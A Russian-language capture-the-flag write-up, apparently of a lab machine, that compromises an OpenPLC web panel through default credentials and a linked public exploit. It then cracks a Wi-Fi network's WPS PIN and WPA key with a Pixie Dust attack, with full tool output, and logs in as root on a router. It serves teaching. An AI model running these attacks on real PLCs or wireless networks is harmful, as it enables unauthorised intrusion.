Telegram / Boosty / Видео
Подпишись на канал t.me/kiberdruzhinnik, чтобы не пропускать контент.
Также на https://boosty.to/kiberdruzhinnik/posts/feb891b8-93c3-4663-ba15-d29fe129b0e4 я опубликовал подробный видео разбор этой задачи. Это может быть полезно для обучения, если вы делаете первые шаги в информационной безопасности. Поддержать меня на Boosty.
Просканируем порты машины с помощью rustscan:
Open 10.129.127.49:22
Open 10.129.127.49:8080
Веб
Нас встречает веб-версия OpenPLC.
Используем учетные данные по умолчанию и попадаем в админку, что позволяет нам воспользоваться эксплоитом https://www.exploit-db.com/exploits/49803.
Флаг пользователя
Повышение привилегий
Мы должны двигаться в сторону подключения сетевого интерфейса wlan0 к сети plcrouter.
$ iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA"
< | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA"
BSS 02:00:00:00:01:00(on wlan0)
SSID: plcrouter
* Authentication suites: PSK
* SSID List
WPS: * Version: 1.0
На удаленной машине воспользуемся утилитой OneShot для атаки Pixie Dust:
$ python3 oneshot.py -i wlan0 -K
[*] Running wpa_supplicant…
[*] BSSID not specified (--bssid) — scanning for available networks
Network marks: Possibly vulnerable | WPS locked | Already stored
Networks list:
# BSSID ESSID Sec. PWR WSC device name WSC model
1) 02:00:00:00:01:00 plcrouter WPA2 -30
Select target (press Enter to refresh): 1
> 1
[*] Running wpa_supplicant…
[*] Trying PIN '12345670'…
[*] Scanning…
[*] Authenticating…
[+] Authenticated
[*] Associating with AP…
[+] Associated with 02:00:00:00:01:00 (ESSID: plcrouter)
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[P] E-Nonce: 1DAC8A5280D145FF3456FBFCB0E4609D
[*] Sending WPS Message M2…
[P] PKR: BAD477AFB06BB77F79CAD309397CDD39E32B90E3844FF9787E705A0259D88E0DA2BCACF4B05D470D5934CCAFB9A71D82E5BC261EB57EEFEFFF7860AF8060FDC4211F79D9C859BF8A461A995950DDDAD01A528634BED5F669432AE6E0369D0EACD222000F8184EAF3239709C89B93A39A970D904795837342A1DAEF481EE32386354E09D3F6E7204A71D17170DD82D66DB02DA828CB80D39CD0EB945414ADD1891C3679724F6BACD148475219D8231B2C73EBB3326D4B9CD7D128F928CAA42189
[P] PKE: B0CA7FC68CEAEC15A5E9024095F98FD71805ABF7A62BF46209A1F1EED95126B1949CEF203B711C5BE4AF4958C886DE867E6EC4ECB08F1033FE71787D7CECEDC2A2A6D14F6345FDE01407B0C8C105373E6A82A9E30625976621B8882B19A11FDBED89F59B3D6B1C39D1445728325DD41AA9E7F095729D43DC8BE4E8F18392B93DEAB87CDF6A9BAAA837287D8F419ED955295346B13CD4A4DB4B744415EE806418FFA41B709A97D9E76B0CD37BAA7360AB256262AD92768463D51657E909015A02
[P] AuthKey: E9286E1AF6549FDF9A2DC27DC9940A20B5C97284E739BF3DFCCE410F90327937
[*] Received WPS Message M3
[P] E-Hash1: A03FDEDA0BD6DEB0EBF1F4D0A74AB31FFD2B4AE1C9A02831CF7025CA0C85329E
[P] E-Hash2: 496D89096B87BACEAAAC755E934DA4965BC9C2ED046F5138004282933A0300CD
[*] Sending WPS Message M4…
[*] Received WPS Message M5
[+] The first half of the PIN is valid
[*] Sending WPS Message M6…
[*] Received WPS Message M7
[+] WPS PIN: '12345670'
[+] WPA PSK: 'pwd'
[+] AP SSID: 'plcrouter'
Сразу же получили пароль от Wi-Fi сети plcrouter.
Осуществим подключение к сети с помощью гайда.
Просканируем внутреннюю сеть 192.168.1.1/24 и обнаружим роутер с пустым паролем. После проброса SSH порта подключаемся как root и забираем флаг.
Флаг суперпользователя
